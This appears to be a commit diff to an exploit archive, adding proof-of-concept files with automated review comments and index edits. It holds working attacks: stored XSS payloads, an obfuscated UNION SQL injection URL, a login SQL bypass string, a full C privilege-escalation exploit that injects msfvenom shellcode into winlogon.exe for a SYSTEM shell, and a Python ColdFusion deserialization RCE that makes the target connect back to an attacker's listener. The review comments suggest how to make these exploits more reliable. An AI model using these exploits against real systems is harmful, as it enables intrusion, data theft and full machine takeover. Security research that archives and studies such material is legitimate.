5. You will be having a popup "PKP"
|
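Review bot: `# Version: =>3.0` is ambiguous (3.0 and later? exactly 3.0?) and the csv line carries no version at all, so state the exact build that was tested; the Software Link points at exclusivescript.com while the Vendor Homepage is phpscriptsmall.com, so say which vendor's package this is. `# CVE: NA` should be `N/A` like the sibling advisories. The PoC again only shows the author's own popup; name the view in which other users see the saved profile.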
exploits/php/webapps/43990.txt (Normal file, 20 lines)

@ -0,0 +1,20 @@
######################################################################################
# Exploit Title: Naukri Clone Script - Stored XSS
# Date: 06.02.2018
# Exploit Author: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/naukri-clone-script/
# Category: Web Application
# Version: 3.0.3
# Tested on: Linux Mint
# CVE: na
#######################################################################################

Proof of Concept
=================
1. Login as a jobseeker
2. Goto "Edit Profile"
3. Edit any field with "<script>alert("PKP")</script>"
4. Save Profile
5. You will be having a popup "PKP"
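Review bot: `# Version: 3.0.3` in the header is dropped from the csv title while 43988 keeps its 1.0.2; keep the two in step. `# CVE: na` should be `N/A`. The reproduction is done as a jobseeker, so the natural victim is the employer or admin who views jobseeker profiles; say which of those pages renders the stored field unencoded rather than "any field" plus the submitter's own popup.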
exploits/php/webapps/43991.txt (Normal file, 20 lines)

@ -0,0 +1,20 @@
######################################################################################
# Exploit Title: Hot Scripts Clone : Script Classified - Stored XSS
# Date: 06.02.2018
# Exploit Author: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/hot-scripts-clone-script-classified/
# Category: Web Application
# Version: 3.1
# Tested on: Linux Mint
# CVE: na
#######################################################################################

Proof of Concept
=================
1. Login to Hot Scripts Clone : Script Classified
2. Select Any Ads
3. Goto below review section and put "<script>alert("PKP")</script>" as
title or description
4. You will have popup of "PKP"
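Review bot: step 3 says the payload goes in a review's "title or description" but never states the request or that the review is rendered to other visitors of the ad (or to an admin moderating reviews); a stored XSS is only an issue where someone else's browser renders it, so name that view. `# Version: 3.1` is missing from the csv title and `# CVE: na` should be `N/A`.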
exploits/php/webapps/43994.txt (Normal file, 27 lines)

@ -0,0 +1,27 @@
# Exploit Title: Online Test Script 2.0.7 - 'cid' SQL Injection
# Dork: N/A
# Date: 2018-02-07
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://www.phpscriptsmall.com/product/online-test-script/
# Version: 2.0.7
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands.
# # # # #
# Proof of Concept :

SQLi:

# server/login.php?normal&cid=[SQL]

# Parameter : cid (GET)
# Type: UNION QUERY
# Title: Generic UNION query (NULL) - 5 columns
# payload : /*!00000UNION*/ ALL SELECT
NULL,/*!00000Concat('L0RD',0x3C62723E,version(),0x3C62723E,user(),0x3C62723E,database())*/,/*!00000group_coNcat(0x3C62723E,table_name,0x3a,column_name)*/,NULL,NULL
/*!00000from*/ information_schema.columns where table_schema=schema()%23

Test :
http://server/login.php?normal&cid=-2%20/*!00000UNION*/%20ALL%20SELECT%20NULL,/*!00000Concat(%27L0RD%27,0x3C62723E,version(),0x3C62723E,user(),0x3C62723E,database())*/,/*!00000group_coNcat(0x3C62723E,table_name,0x3a,column_name)*/,NULL,NULL%20/*!00000from*/%20information_schema.columns%20where%20table_schema=schema()%23
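Review bot: the only payload shown is the inline-comment form (`/*!00000UNION*/`, `/*!00000Concat(...)*/`, `group_coNcat`), without saying whether `login.php` filters the plain keywords; give the plain `cid=-2 UNION ALL SELECT NULL,...` first and the bypass as a variant, otherwise readers cannot tell whether a WAF or an application filter was in play. "Generic UNION query (NULL) - 5 columns" is an sqlmap-style label with no indication of how the column count was established, and the `0x3C62723E` (`<br>`) separators imply the result is echoed into the page, which should be stated together with where it appears. The bare `normal` flag in `login.php?normal&cid=[SQL]` is unexplained.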
exploits/php/webapps/43995.txt (Normal file, 22 lines)

@ -0,0 +1,22 @@
# Exploit Title: Entrepreneur Dating Script 2.0.2 - Authentication Bypass
# Dork: N/A
# Date: 2018-02-07
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://www.phpscriptsmall.com/product/entrepreneur-dating-script/
# Version: 2.0.2
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# With this exploit,attacker can login as any user without any authentication.
# # # # #
# Proof of Concept :

# 1) First go to login page .

# 2) Username : anything , Password : ' or 'x'='x

PoC Video :
http://s8.picofile.com/file/8318741292/Autentication_Bypass.mp4.html

Test : http://server/login.php?lerr
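Review bot: the bypass is a SQL injection in the login query (`Password : ' or 'x'='x`), but the advisory never says so and gives no request or query shape, which is exactly what the fix (a parameterized query) needs. "attacker can login as any user" is not backed by the PoC: with `Username : anything` the session lands on whichever row the injected query returns first, so either show a variant in which the username selects the account or narrow the claim. The `Test : http://server/login.php?lerr` line is unexplained, and the picofile video is the only evidence offered.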
exploits/windows/local/43987.c (Normal file, 205 lines)

@ -0,0 +1,205 @@
/*
Title: MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation
Date: 03/02/2018
Author: Souhail Hammou
Vendor Homepage: https://www.malwarefox.com/
Version: 2.74.0.150
Tested on: Windows 7 32-bit / Windows 10 64-bit
CVE: CVE-2018-6606
*/
#include <Windows.h>
#include <TlHelp32.h>
#include <stdio.h>


BOOL RegisterProcessByIOCTL(HANDLE hDevice)
{
DWORD pid, BytesReturned;

/*
IOCTL 0x80002010 registers a process, by its PID, as trusted by the driver. Registered
processes can send special IOCTLs to the driver to do stuff like:
- Enable/Disable real-time protection
- Write to raw disk
- Open full access handles to processes
- ...etc

When a process sends a special IOCTL, the driver checks if that process is registered (as
shown in the disassembly below at address 0000000140010573).
However, when a process sends the IOCTL 0x80002010 to register a process by its PID, the driver
doesn't check to see if the requestor itself is registered (0000000140010553).
That way, any process can register any other process (including itself) with the driver.

.text:000000014001054A mov ebx, [rcx+_IO_STACK_LOCATION.Parameters.DeviceIoControl.IoControlCode]
.text:000000014001054D cmp ebx, 80002010h
.text:0000000140010553 jz short find_ioctl_dispatcher ;jump past the check

[......]

.text:0000000140010573 mov edx, 1
.text:0000000140010578 mov ecx, ebp ; Requestor_PID
.text:000000014001057A call IsProcessRegistered
.text:000000014001057F lea rdx, aMain_c
.text:0000000140010586 test eax, eax
.text:0000000140010588 jnz short loc_1400105C2
.text:000000014001058A mov [rsp+68h+var_38], ebp
.text:000000014001058E lea rax, aProcessidDIsNo
.text:0000000140010595 mov edi, STATUS_ACCESS_DENIED

[......]

.text:00000001400105C8 find_ioctl_dispatcher: ; CODE XREF: sub_1400104BC+97j
.text:00000001400105C8 ; sub_1400104BC+ACj

[......]

.text:0000000140010612 cmp ebx, 80002010h
.text:0000000140010618 jz loc_1400106D7 ; dispatch the IOCTL
*/

pid = GetCurrentProcessId(); //Register our process with the driver
if (!DeviceIoControl(hDevice, 0x80002010, &pid, sizeof(DWORD), NULL, 0, &BytesReturned, NULL))
{
return FALSE;
}

return TRUE;
}

DWORD GetWinlogonPID()
{
DWORD WinlogonPid = 0;
PROCESSENTRY32 ProcessEntry;
ProcessEntry.dwSize = sizeof(PROCESSENTRY32);

HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE)
{
printf("[-] CreateToolhelp32Snapshot failed !\n");
goto ret;
}

if (!Process32First(hSnapshot, &ProcessEntry))
{
printf("[-] Process32First failed !\n");
goto cleanup;
}

do
{
if (!lstrcmp(ProcessEntry.szExeFile, "winlogon.exe"))
{
WinlogonPid = ProcessEntry.th32ProcessID;
break;
}
} while (Process32Next(hSnapshot, &ProcessEntry));

cleanup:
CloseHandle(hSnapshot);
ret:
return WinlogonPid;
}
int main(int argc, char** argv)
{
DWORD BytesReturned;
DWORD winlogon_pid;
HANDLE winlogon_handle;
LPVOID RemoteAllocation;
HANDLE hDevice;

printf("=== MalwareFox Anti-Malware 2.74.0.150 zam64.sys Local Privilege Escalation ===\n");
printf(" Tested on Windows 10 64-bit \n");
printf(" Souhail Hammou \n\n");
printf("[*] Stage 1: Registering the process with the driver by sending IOCTL 0x80002010\n");

hDevice = CreateFile
("\\\\.\\ZemanaAntiMalware",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
{
return 0;
}


if (!RegisterProcessByIOCTL(hDevice))
{
printf("\t[-] Registration Failed !\n");
return 0;
}

printf("\t[+] Process registered.\n[*] Stage 2: \n");

printf("\t[+] Getting Winlogon's PID\n");
winlogon_pid = GetWinlogonPID();

if (!winlogon_pid)
{
printf("\t[-] GetWinlogonPID() failed !\n");
return 0;
}

printf("\t[+] (IOCTL) Opening a full access, user-mode accessible handle from kernel-mode to winlogon\n");

/*
The dispatcher for IOCTL code 0x8000204C opens a full access handle, accessible from usermode, to a process.
We use this IOCTL to open a full access handle to winlogon.exe.
Note that this IOCTL can only be sent if the process is registered with the driver.
*/
if (!DeviceIoControl(hDevice, 0x8000204C, &winlogon_pid, sizeof(DWORD), &winlogon_handle, sizeof(HANDLE), &BytesReturned, NULL))
{
printf("\t[-] DeviceIoControl 0x8000204C failed !\n");
return 0;
}

printf("\t[+] Allocating executable memory in winlogon.exe using the full access handle\n");

if (!(RemoteAllocation = VirtualAllocEx(winlogon_handle, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE)))
{
printf("\t[-] VirtualAllocEx failed !\n");
return 0;
}

printf("\t[+] Writing shellcode to allocated memory\n");

/*msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread -f c*/
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00";

if (!WriteProcessMemory(winlogon_handle, RemoteAllocation, buf, sizeof(buf), &BytesReturned))
{
printf("\t[-] WriteProcessMemory Failed !\n");
return 0;
}

printf("\t[+] Spawning SYSTEM shell\n");
if (!CreateRemoteThread(winlogon_handle, NULL, 0, RemoteAllocation, NULL, 0, NULL))
{
printf("\t[-] CreateRemoteThread Failed! Did you compile the exploit as a 64-bit executable ?\n");
return 0;
}
}
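Review bot: the header claims `Tested on: Windows 7 32-bit / Windows 10 64-bit`, but the embedded payload is `msfvenom -p windows/x64/exec`, the banner in main() says only "Tested on Windows 10 64-bit", and the sole guard is a message printed after CreateRemoteThread has already failed ("Did you compile the exploit as a 64-bit executable ?"); either drop the 32-bit claim or ship a 32-bit payload, and reject an x86 build at compile time with `#ifndef _WIN64` / `#error`. `lstrcmp(ProcessEntry.szExeFile, "winlogon.exe")` only compiles in an ANSI build because `szExeFile` is `TCHAR[]`; use `PROCESSENTRY32W` with `lstrcmpiW` (or the `A` variants) explicitly. Minor: the `CreateFile` failure returns silently with no message, `hDevice` is never closed on the error paths, and `main()` falls off the end without a return statement.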
exploits/windows/remote/43993.py (Executable file, 37 lines)

@ -0,0 +1,37 @@
# Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE
# Date: February 6, 2018
# Exploit Author: Faisal Tameesh (@DreadSystems)
# Company: Depth Security (https://depthsecurity.com)
# Version: Adobe Coldfusion (11.0.03.292866)
# Tested On: Windows 10 Enterprise (10.0.15063)
# CVE: CVE-2017-3066
# Advisory: https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html
# Category: remote

# Notes:
# This is a two-stage deserialization exploit. The code below is the first stage.
# You will need a JRMPListener (ysoserial) listening at callback_IP:callback_port.
# After firing this exploit, and once the target server connects back,
# JRMPListener will deliver the secondary payload for RCE.

import struct
import sys
import requests

if len(sys.argv) != 5:
print "Usage: ./cf_blazeds_des.py target_IP target_port callback_IP callback_port"
quit()

target_IP = sys.argv[1]
target_port = sys.argv[2]
callback_IP = sys.argv[3]
callback_port = sys.argv[4]

amf_payload = '\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a' + \
'\x07\x33' + 'sun.rmi.server.UnicastRef' + struct.pack('>H', len(callback_IP)) + callback_IP + \
struct.pack('>I', int(callback_port)) + \
'\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00';

url = "http://" + target_IP + ":" + target_port + "/flex2gateway/amf"
headers = {'Content-Type': 'application/x-amf'}
response = requests.post(url, headers=headers, data=amf_payload, verify=False)
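Review bot: `response` is assigned and never inspected, so the operator gets no indication whether the gateway accepted the AMF body (the attack only succeeds once the server connects back to the JRMPListener); print `response.status_code` and the reply Content-Type and fail loudly on a non-AMF answer. The URL is hard-coded to `http://`, so a TLS-only ColdFusion cannot be targeted even though `verify=False` is already passed; take the scheme from the arguments. The `print` statements and the byte/str concatenation in `amf_payload` make this Python 2 only, which the header should say. The JRMPListener note would be more useful with the invocation it refers to, e.g. `java -cp ysoserial.jar ysoserial.exploit.JRMPListener <callback_port> <gadget> '<command>'`.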

@ -5369,7 +5369,7 @@ id,file,description,date,author,type,platform,port
40959,exploits/multiple/dos/40959.c,"Apple macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement",2016-12-22,"Google Security Research",dos,multiple,
40964,exploits/windows/dos/40964.py,"XAMPP Control Panel - Denial Of Service",2016-12-25,hyp3rlinx,dos,windows,
40965,exploits/windows/dos/40965.py,"FTPShell Server 6.36 - '.csv' Local Denial of Service",2016-12-26,"sultan albalawi",dos,windows,
40985,exploits/linux/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,dos,linux,
40985,exploits/hardware/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,dos,hardware,
40994,exploits/multiple/dos/40994.html,"Brave Browser 1.2.16/1.9.56 - Address Bar URL Spoofing",2017-01-08,"Aaditya Purani",dos,multiple,
40996,exploits/php/dos/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",dos,php,
41008,exploits/multiple/dos/41008.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (1)",2017-01-11,COSIG,dos,multiple,
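Review bot: the 40985 line moves the file from `exploits/linux/dos/40985.txt` to `exploits/hardware/dos/40985.txt` and the platform from `linux` to `hardware`, but no rename of the file itself is visible in this diff; if the move is not part of the same commit, `searchsploit -m 40985` and anything else that trusts this csv will resolve to a path that does not exist. Confirm the rename is included.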
@ -5393,7 +5393,7 @@ id,file,description,date,author,type,platform,port
41215,exploits/multiple/dos/41215.html,"Apple WebKit - 'HTMLKeygenElement' Type Confusion",2017-02-01,"Google Security Research",dos,multiple,
41216,exploits/multiple/dos/41216.html,"Apple WebKit - Type Confusion in RenderBox with Accessibility Enabled",2017-02-01,"Google Security Research",dos,multiple,
41218,exploits/android/dos/41218.txt,"Google Android - RKP Information Disclosure via s2-remapping Physical Ranges",2017-02-01,"Google Security Research",dos,android,
41219,exploits/hardware/dos/41219.txt,"QNAP NVR/NAS - Buffer Overflow (PoC)",2017-02-01,bashis,dos,hardware,
41219,exploits/hardware/dos/41219.txt,"QNAP NVR/NAS Devices - Buffer Overflow (PoC)",2017-02-01,bashis,dos,hardware,
41222,exploits/windows/dos/41222.py,"Microsoft Windows 10 - SMBv3 Tree Connect (PoC)",2017-02-01,"laurent gaffie",dos,windows,
41232,exploits/android/dos/41232.txt,"Google Android - 'rkp_set_init_page_ro' RKP Memory Corruption",2017-02-02,"Google Security Research",dos,android,
41278,exploits/openbsd/dos/41278.txt,"OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service",2017-02-07,PierreKimSec,dos,openbsd,80
@ -5488,6 +5488,10 @@ id,file,description,date,author,type,platform,port
43968,exploits/php/dos/43968.py,"WordPress Core - 'load-scripts.php' Denial of Service",2018-02-05,"Barak Tawily",dos,php,
42341,exploits/windows/dos/42341.c,"Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC)",2017-10-27,"Ivan Ivanovic",dos,windows,
43972,exploits/multiple/dos/43972.txt,"Claymore Dual GPU Miner 10.5 - Format String",2018-02-05,res1n,dos,multiple,3333
43986,exploits/hardware/dos/43986.py,"Cisco ASA - Crash PoC",2018-02-07,"Sean Dillon",dos,hardware,
43992,exploits/multiple/dos/43992.py,"Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption",2018-02-07,"Juan Sacco",dos,multiple,2000
43996,exploits/android/dos/43996.txt,"Android - 'getpidcon' Permission Bypass in KeyStore Service",2018-02-07,"Google Security Research",dos,android,
43998,exploits/multiple/dos/43998.txt,"Multiple OEM - 'nsd' Remote Stack Format String (PoC)",2017-12-14,bashis,dos,multiple,
41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
- Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware,
41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows,
41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows,
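Review bot: 43986 "Cisco ASA - Crash PoC" names neither the ASA release nor the component that crashes, unlike every other new line in this hunk (Asterisk 13.17.2 'chan_skinny', Android 'getpidcon', 'nsd'); the description is what searchsploit matches on, so add the affected versions and feature from the PoC header. The port column is also blank for 43986 and 43998 although both are remote PoCs against a network service, while 43992 carries 2000 and 43972 carries 3333 in the same hunk.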
@ -5887,7 +5891,7 @@ id,file,description,date,author,type,platform,port
186,exploits/linux/local/186.pl,"xsplumber - 'strcpy()' Local Buffer Overflow",2000-11-17,vade79,local,linux,
193,exploits/linux/local/193.sh,"dump 0.4b15 - Local Privilege Escalation",2000-11-19,mat,local,linux,
197,exploits/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 locale - Format String",2000-11-20,"Solar Eclipse",local,solaris,
199,exploits/hp-ux/local/199.c,"HP-UX 11.0 - pppd Stack Buffer Overflow",2000-11-20,K2,local,hp-ux,
199,exploits/hp-ux/local/199.c,"HP-UX 11.0 - 'pppd' Local Stack Buffer Overflow",2000-11-20,K2,local,hp-ux,
200,exploits/bsd/local/200.c,"BSDi SUIDPerl - Local Stack Buffer Overflow",2000-11-21,vade79,local,bsd,
202,exploits/bsd/local/202.c,"BSDi 3.0/4.0 - 'rcvtty[mh]' Local Privilege Escalation",2000-11-21,vade79,local,bsd,
203,exploits/linux/local/203.sh,"vixie-cron - Local Privilege Escalation",2000-11-21,"Michal Zalewski",local,linux,
@ -5941,7 +5945,7 @@ id,file,description,date,author,type,platform,port
331,exploits/linux/local/331.c,"LibXt - 'XtAppInitialize()' Local Overflow *xterm",1997-05-14,"Ming Zhang",local,linux,
332,exploits/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer",1997-05-19,"Joe Zbiciak",local,solaris,
333,exploits/aix/local/333.c,"AIX 4.2 - '/usr/dt/bin/dtterm' Local Buffer Overflow",1997-05-27,"Georgi Guninski",local,aix,
334,exploits/irix/local/334.c,"SGI IRIX - 'LsD' Multiple Buffer Overflows",1997-05-25,LSD-PLaNET,local,irix,
334,exploits/irix/local/334.c,"SGI IRIX - 'LsD' Multiple Local Buffer Overflows",1997-05-25,LSD-PLaNET,local,irix,
335,exploits/aix/local/335.c,"AIX lquerylv - Local Buffer Overflow / Local Privilege Escalation",1997-05-26,"Georgi Guninski",local,aix,
336,exploits/irix/local/336.c,"SGI IRIX - '/bin/login' Local Buffer Overflow",1997-05-26,"David Hedley",local,irix,
337,exploits/irix/local/337.c,"IRIX 5.3 - '/usr/sbin/iwsh' Local Buffer Overflow / Local Privilege Escalation",1997-05-27,"David Hedley",local,irix,
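Review bot: in the 334 line `'LsD'` sits in the single quotes this file uses for the vulnerable program (`'/usr/dt/bin/dtterm'`, `'/bin/login'`, `'/usr/sbin/iwsh'` in the same hunk), but LsD is the author group (the author column reads LSD-PLaNET), not a binary; adding "Local" does not fix that, so either drop the quoted token or replace it with the affected IRIX programs.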
@ -6039,7 +6043,7 @@ id,file,description,date,author,type,platform,port
877,exploits/linux/local/877.pl,"Frank McIngvale LuxMan 0.41 - Local Buffer Overflow",2005-03-14,"Kevin Finisterre",local,linux,
884,exploits/windows/local/884.cpp,"iSnooker 1.6.8 - Local Password Disclosure",2005-03-16,Kozan,local,windows,
885,exploits/windows/local/885.cpp,"iPool 1.6.81 - Local Password Disclosure",2005-03-16,Kozan,local,windows,
890,exploits/linux/local/890.pl,"PostScript Utilities - 'psnup' Argument Buffer Overflow",2005-03-21,lammat,local,linux,
890,exploits/linux/local/890.pl,"PostScript Utilities - 'psnup' Local Buffer Overflow",2005-03-21,lammat,local,linux,
895,exploits/linux/local/895.c,"Linux Kernel 2.4.x/2.6.x - 'uselib()' Local Privilege Escalation (3)",2005-03-22,sd,local,linux,
896,exploits/osx/local/896.c,"Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow / Local Privilege Escalation",2005-03-22,vade79,local,osx,
898,exploits/aix/local/898.sh,"AIX 5.3.0 - 'invscout' Local Command Execution",2005-03-25,ri0t,local,aix,
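Review bot: the 890 rewrite replaces "Argument Buffer Overflow" with "Local Buffer Overflow", which drops the only hint of the vector (a command-line argument to psnup); the neighbouring titles keep the vector visible (`'uselib()'`, `'CF_CHARSET_PATH'`), so keep the argument reference, e.g. "'psnup' Argument Local Buffer Overflow".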
@ -6178,7 +6182,7 @@ id,file,description,date,author,type,platform,port
2065,exploits/windows/local/2065.c,"Cheese Tracker 0.9.9 - Local Buffer Overflow",2006-07-23,"Luigi Auriemma",local,windows,
2067,exploits/solaris/local/2067.c,"Solaris 10 - 'sysinfo()' Local Kernel Memory Disclosure (1)",2006-07-24,prdelka,local,solaris,
2091,exploits/windows/local/2091.cpp,"Microsoft PowerPoint 2003 SP2 (French) - Local Code Execution",2006-07-30,NSRocket,local,windows,
2094,exploits/windows/local/2094.c,"Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Buffer Overflows",2006-07-31,"Luigi Auriemma",local,windows,
2094,exploits/windows/local/2094.c,"Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Local Buffer Overflows",2006-07-31,"Luigi Auriemma",local,windows,
2106,exploits/osx/local/2106.pl,"Apple Mac OSX 10.4.7 (x86) - 'fetchmail' Local Privilege Escalation",2006-08-01,"Kevin Finisterre",local,osx,
2107,exploits/osx/local/2107.pl,"Apple Mac OSX 10.4.7 (PPC) - 'fetchmail' Local Privilege Escalation",2006-08-01,"Kevin Finisterre",local,osx,
2108,exploits/osx/local/2108.sh,"Apple Mac OSX 10.4.7 - fetchmail Privilege Escalation",2006-08-01,"Kevin Finisterre",local,osx,
@ -9314,6 +9318,7 @@ id,file,description,date,author,type,platform,port
43971,exploits/linux/local/43971.rb,"Apport/ABRT - 'chroot' Local Privilege Escalation (Metasploit)",2018-02-05,Metasploit,local,linux,
43973,exploits/windows/local/43973.c,"MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation",2018-02-05,"Souhail Hammou",local,windows,
43979,exploits/linux/local/43979.py,"BOCHS 2.6-5 - Local Buffer Overflow",2018-02-05,"Juan Sacco",local,linux,
43987,exploits/windows/local/43987.c,"MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation",2018-02-07,"Souhail Hammou",local,windows,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
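Review bot: the new 43987 line matches 43973 two lines above in every column except id, date and title (same product, version, author, type and platform), and the 43987.c header in this commit itself reads "Local Privilege Escalation" while the csv title drops "Local"; confirm that 43987 is a distinct submission from 43973 rather than a resubmission, make the title say how it differs (e.g. the IOCTL or driver involved), and align it with the file header.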
@ -15989,6 +15994,17 @@ id,file,description,date,author,type,platform,port
43936,exploits/windows/remote/43936.py,"Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH)",2018-02-01,"Daniel Teixeira",remote,windows,
43939,exploits/multiple/remote/43939.rb,"BMC Server Automation RSCD Agent - NSH Remote Command Execution (Metasploit)",2018-02-01,Metasploit,remote,multiple,
43970,exploits/windows/remote/43970.rb,"Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)",2018-02-05,Metasploit,remote,windows,
43982,exploits/hardware/remote/43982.txt,"Geovision Inc. IP Camera/Video/Access Control - Multiple Remote Command Execution / Stack Overflow / Double Free / Unauthorized Access",2018-02-01,bashis,remote,hardware,
43983,exploits/hardware/remote/43983.py,"Geovision Inc. IP Camera & Video - Remote Command Execution",2018-02-01,bashis,remote,hardware,
43984,exploits/multiple/remote/43984.txt,"Axis SSI - Remote Command Execution / Read Files",2017-10-20,bashis,remote,multiple,
43985,exploits/multiple/remote/43985.txt,"Axis Communications MPQT/PACS - Heap Overflow / Information Leakage",2017-11-30,bashis,remote,multiple,
43993,exploits/windows/remote/43993.py,"Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution",2018-02-07,"Faisal Tameesh",remote,windows,
43997,exploits/hardware/remote/43997.py,"Herospeed - 'TelnetSwitch' Remote Stack Overflow / Overwrite Password / Enable TelnetD",2018-01-22,bashis,remote,hardware,787
43999,exploits/multiple/remote/43999.txt,"Uniview - Remote Command Execution / Export Config (PoC)",2017-10-28,bashis,remote,multiple,
44000,exploits/multiple/remote/44000.txt,"Vitek - Remote Command Execution / Information Disclosure (PoC)",2017-12-22,bashis,remote,multiple,
44001,exploits/multiple/remote/44001.txt,"Vivotek IP Cameras - Remote Stack Overflow (PoC)",2017-12-12,bashis,remote,multiple,
44002,exploits/multiple/remote/44002.py,"Dahua Generation 2/3 - Backdoor Access",2017-05-02,bashis,remote,multiple,
44004,exploits/hardware/remote/44004.py,"HiSilicon DVR Devices - Remote Code Execution",2017-09-07,"Istvan Toth",remote,hardware,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22
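Review bot: the platform column is inconsistent across the new camera/NVR lines: Geovision, Herospeed and HiSilicon are `hardware` while Axis, Uniview, Vitek, Vivotek and Dahua are `multiple`, although all eight are device-firmware advisories (seven of them from the same author); pick one value. 43993 is tagged `windows` only because the author tested on Windows 10 (see the 43993.py header); the `/flex2gateway/amf` endpoint belongs to the Java ColdFusion server and the script does nothing Windows-specific, so `multiple` would serve users of the csv better.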
@ -16464,7 +16480,7 @@ id,file,description,date,author,type,platform,port
1567,exploits/php/webapps/1567.php,"RedBLoG 0.5 - 'cat_id' SQL Injection",2006-03-08,x128,webapps,php,
1569,exploits/asp/webapps/1569.pl,"d2kBlog 1.0.3 - 'memName' SQL Injection",2006-03-09,DevilBox,webapps,asp,
